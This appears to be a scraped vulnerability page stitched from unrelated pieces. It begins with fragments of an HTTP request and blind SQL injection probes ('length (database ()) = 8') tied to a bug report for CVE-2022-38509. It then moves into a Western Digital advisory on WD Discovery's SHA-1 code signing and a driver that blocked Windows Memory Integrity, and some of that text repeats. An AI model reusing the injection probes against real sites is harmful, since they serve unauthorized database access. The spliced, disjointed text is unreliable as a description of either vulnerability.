Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

When length (database ()) = 8 

When length (database ()) = 9

CVE-2022-38509: bug_report/SQLi-1.md at main · ptanly/bug_report

WD Discovery software executable files were signed with an unsafe SHA-1 hashing algorithm. An attacker could use this weakness to create forged certificate signatures due to the use of a hashing algorithm that is not collision-free. This could thereby impact the confidentiality of user content. This issue affects: Western Digital WD Discovery WD Discovery Desktop App versions prior to 4.4.396 on Mac; WD Discovery Desktop App versions prior to 4.4.396 on Windows.

**Last Updated:** September 20, 2022

**Description**

WD Discovery Desktop App Version 4.4.396 includes updates to help improve the security of your WD software.

Users can download the latest version from the WD Discovery Downloads page or by following the instructions on the WD Discovery: Online User Guide.

**Advisory Summary**

WD Discovery versions prior to 4.4.396 were installing a Windows 7-compatible driver on Windows 10 systems that prevented the Windows 10 Memory Integrity option from being enabled. Memory integrity is a feature of core isolation that prevents malicious code from accessing high-security processes in the event of an attack. WD Discovery version 4.4.396 addresses this issue by replacing the driver with one that is compatible with Memory Integrity. In either case, old or new driver, there was no impact to normal hard drive operation.

**Reported By:** Western Digital would like to thank Aaron LeMieux of Microsoft for reporting this issue.

WD Discovery software executable files were signed with an unsafe SHA-1 hashing algorithm. This has been updated to the SHA-256 hashing algorithm to support secure code signing.

**CVE Number:** CVE-2022-29835

Tag

#windows